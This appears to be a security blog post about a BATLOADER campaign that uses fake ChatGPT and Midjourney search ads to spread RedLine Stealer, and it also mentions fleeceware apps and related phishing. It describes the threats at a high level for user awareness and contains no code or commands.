Introduction:
Malicious actors are taking advantage of the popularity of generative AI services, such as OpenAI ChatGPT and Midjourney, by using deceptive Google Search ads. These ads are part of a BATLOADER campaign designed to distribute the RedLine Stealer malware. The lack of first-party standalone apps for these AI services has created an opportunity for threat actors to redirect users to fake websites promoting counterfeit applications. This blog post explores the tactics employed by the attackers and the potential risks associated with these malicious ads.
BATLOADER Campaign Exploiting AI Services:
By driving users to fake ads on search engines, BATLOADER initiates drive-by downloads of loader malware.Clicking on these ads redirects users to rogue landing pages hosting malware. The installer file contains an executable file (ChatGPT.exe or midjourney.exe) and a PowerShell script (Chat.ps1 or Chat-Ready.ps1) that downloads and loads the RedLine Stealer from a remote server.
Clever Redirection Techniques:
To avoid detection, the RedLine Stealer binary utilizes the Microsoft Edge WebView2 feature to load legitimate URLs, such as chat.openai.com or www.midjourney.com, in a pop-up window. This strategy aims to trick users into believing they are interacting with the authentic ChatGPT or Mid Journey interfaces, minimizing suspicion.
Previous Exploitation and Google’s Response:
The exploitation of ChatGPT and Midjourney-themed lures to distribute malware is not a new phenomenon. Earlier attacks capitalised on the AI trend to deploy Vidar Stealer and Ursnif malware. However, it appears that Google has taken measures to curb the abuse of Google Search ads, leading to a decline in their usage. This aligns with broader phishing and scam campaigns seeking to exploit the rising popularity of AI tools to distribute malware and fraudulent applications.
Fleecewear Apps and Other Threats:
In addition to the BOOTLOADER campaign, there has been an increase in fleecewear apps related to ChatGPT in Google Play and the Apple App Store. These apps coerce users into unwanted subscriptions while skirting the boundaries of platform terms of service. Furthermore, other cybersecurity vendors have reported fraudulent activities mimicking the ChatGPT service to harvest credit card details, perpetrate credit card fraud, and steal Facebook account information.
Growing Concerns and Detection Efforts:
The surge in registrations for domains related to ChatGPT underscores the growing concern surrounding these AI services. Security researchers have been working diligently to identify and expose phishing campaigns, JavaScript downloaders, and malware-as-a-service (MaaS) operations associated with these threats. Recent investigations have even revealed the identities of key operators involved in these activities.
Conclusion:
Users of generative AI services like OpenAI ChatGPT and Midjourney must remain vigilant and cautious when encountering Google Search ads. The presence of malicious actors seeking to exploit these popular services highlights the need for heightened cybersecurity awareness. By understanding the risks and staying informed about ongoing threats, users can better protect themselves from falling victim to malware, fake applications, and subscription scams